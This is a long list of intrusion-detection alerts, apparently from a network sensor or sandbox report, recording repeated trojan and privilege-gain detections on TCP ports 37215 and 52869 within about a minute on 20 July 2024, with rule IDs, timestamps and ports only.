                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.097857
                      SID:2835222
                      Source Port:59062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2835222
                      Source Port:42156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2027339
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:35136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.447286
                      SID:2025132
                      Source Port:42194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2835222
                      Source Port:49954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.874808
                      SID:2027339
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.305474
                      SID:2025132
                      Source Port:58086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2025132
                      Source Port:53838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.184321
                      SID:2835222
                      Source Port:46508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631134
                      SID:2829579
                      Source Port:33198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.807714
                      SID:2831300
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2835222
                      Source Port:42860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982479
                      SID:2829579
                      Source Port:39280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:34808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.033216
                      SID:2025132
                      Source Port:59516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.524729
                      SID:2831300
                      Source Port:49608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:16.647796
                      SID:2025132
                      Source Port:49650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.356106
                      SID:2027339
                      Source Port:50206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.401340
                      SID:2831300
                      Source Port:47090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2831300
                      Source Port:39998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2831300
                      Source Port:45918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.323043
                      SID:2027339
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.855159
                      SID:2027339
                      Source Port:50424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.476492
                      SID:2025132
                      Source Port:37172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.037758
                      SID:2025132
                      Source Port:58232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.704194
                      SID:2025132
                      Source Port:51816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2829579
                      Source Port:36992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2027339
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.825670
                      SID:2831300
                      Source Port:36608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2027339
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.338154
                      SID:2831300
                      Source Port:60880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2025132
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.826949
                      SID:2831300
                      Source Port:53120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.817436
                      SID:2835222
                      Source Port:53206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043964
                      SID:2829579
                      Source Port:48498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704900
                      SID:2027339
                      Source Port:53568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.977483
                      SID:2027339
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.450410
                      SID:2025132
                      Source Port:48078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2831300
                      Source Port:44618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2829579
                      Source Port:50806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.906061
                      SID:2831300
                      Source Port:33136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2831300
                      Source Port:52830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.031343
                      SID:2027339
                      Source Port:53470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2027339
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:53068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.546338
                      SID:2831300
                      Source Port:52250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.292331
                      SID:2831300
                      Source Port:51002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2829579
                      Source Port:45294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.732056
                      SID:2831300
                      Source Port:49360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.236261
                      SID:2025132
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.475886
                      SID:2027339
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994703
                      SID:2025132
                      Source Port:33678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.483452
                      SID:2027339
                      Source Port:40680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2027339
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2025132
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.951743
                      SID:2027339
                      Source Port:39594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.100052
                      SID:2025132
                      Source Port:47786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.055900
                      SID:2831300
                      Source Port:38080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2027339
                      Source Port:52792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.103737
                      SID:2829579
                      Source Port:45384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.944679
                      SID:2835222
                      Source Port:48608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.783592
                      SID:2025132
                      Source Port:55066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.045831
                      SID:2829579
                      Source Port:37860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.397238
                      SID:2025132
                      Source Port:34138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.407718
                      SID:2831300
                      Source Port:35494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.633635
                      SID:2829579
                      Source Port:53564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.585039
                      SID:2025132
                      Source Port:46868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.709674
                      SID:2027339
                      Source Port:36216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.989215
                      SID:2025132
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2025132
                      Source Port:47078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2835222
                      Source Port:39240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2027339
                      Source Port:60618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.243266
                      SID:2027339
                      Source Port:58200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2025132
                      Source Port:36990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.491060
                      SID:2027339
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.212590
                      SID:2027339
                      Source Port:37236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.476083
                      SID:2831300
                      Source Port:40904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.261026
                      SID:2027339
                      Source Port:51210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2831300
                      Source Port:58384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.312209
                      SID:2027339
                      Source Port:57414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:37118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.956472
                      SID:2831300
                      Source Port:41802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.667238
                      SID:2025132
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2835222
                      Source Port:36888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:43812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.957644
                      SID:2027339
                      Source Port:51404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.271651
                      SID:2025132
                      Source Port:60772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2025132
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2025132
                      Source Port:52788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.813695
                      SID:2831300
                      Source Port:36424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.333817
                      SID:2025132
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2027339
                      Source Port:43292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.088724
                      SID:2831300
                      Source Port:55198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.622268
                      SID:2831300
                      Source Port:56800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2835222
                      Source Port:37634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.738271
                      SID:2027339
                      Source Port:34290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.600782
                      SID:2027339
                      Source Port:56522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.960666
                      SID:2027339
                      Source Port:43428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.384732
                      SID:2831300
                      Source Port:39072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.380561
                      SID:2027339
                      Source Port:44798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.729310
                      SID:2027339
                      Source Port:48676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2025132
                      Source Port:46152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2027339
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2027339
                      Source Port:48784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:45912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.834295
                      SID:2027339
                      Source Port:58622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2829579
                      Source Port:57548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.628544
                      SID:2027339
                      Source Port:50292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.955750
                      SID:2025132
                      Source Port:60080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.408559
                      SID:2025132
                      Source Port:43712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2831300
                      Source Port:54670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:44098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2829579
                      Source Port:37210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.345084
                      SID:2025132
                      Source Port:60784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.509837
                      SID:2027339
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333071
                      SID:2027339
                      Source Port:34288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.530676
                      SID:2027339
                      Source Port:48422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.969418
                      SID:2027339
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2835222
                      Source Port:48058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2027339
                      Source Port:53100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.155981
                      SID:2025132
                      Source Port:52440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.660100
                      SID:2829579
                      Source Port:41958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.126316
                      SID:2025132
                      Source Port:38786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.914703
                      SID:2831300
                      Source Port:42698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.093784
                      SID:2027339
                      Source Port:40746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.437626
                      SID:2025132
                      Source Port:60144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.940746
                      SID:2025132
                      Source Port:36876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.833558
                      SID:2027339
                      Source Port:35974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.223705
                      SID:2027339
                      Source Port:50334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.634606
                      SID:2831300
                      Source Port:60262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2831300
                      Source Port:45964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.709674
                      SID:2027339
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.944007
                      SID:2831300
                      Source Port:60766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:37208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.270795
                      SID:2025132
                      Source Port:58370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:43684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995202
                      SID:2831300
                      Source Port:57242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.596773
                      SID:2027339
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.987678
                      SID:2027339
                      Source Port:40410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.505774
                      SID:2025132
                      Source Port:35458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2831300
                      Source Port:48686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.345401
                      SID:2025132
                      Source Port:44704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:60950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.449345
                      SID:2025132
                      Source Port:42106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.043766
                      SID:2835222
                      Source Port:60040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.356835
                      SID:2831300
                      Source Port:34734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.474975
                      SID:2027339
                      Source Port:36434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:35032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201622
                      SID:2835222
                      Source Port:36396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.444710
                      SID:2027339
                      Source Port:50442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.663524
                      SID:2831300
                      Source Port:47332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2027339
                      Source Port:40722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.987638
                      SID:2027339
                      Source Port:44574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:59710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820149
                      SID:2835222
                      Source Port:57558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684130
                      SID:2027339
                      Source Port:36606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:39066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.810790
                      SID:2027339
                      Source Port:43706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.244235
                      SID:2025132
                      Source Port:36306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.845732
                      SID:2027339
                      Source Port:46188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312186
                      SID:2831300
                      Source Port:38986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2829579
                      Source Port:42414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:60802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2831300
                      Source Port:53996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2835222
                      Source Port:35574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.766239
                      SID:2835222
                      Source Port:38616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2025132
                      Source Port:52392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.285526
                      SID:2831300
                      Source Port:55702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.868029
                      SID:2027339
                      Source Port:39320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.189694
                      SID:2025132
                      Source Port:58170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.324295
                      SID:2027339
                      Source Port:53764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2025132
                      Source Port:41978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.575344
                      SID:2027339
                      Source Port:48332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:44694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.983381
                      SID:2027339
                      Source Port:41326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2025132
                      Source Port:43042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:57642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.233741
                      SID:2831300
                      Source Port:48552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.091220
                      SID:2025132
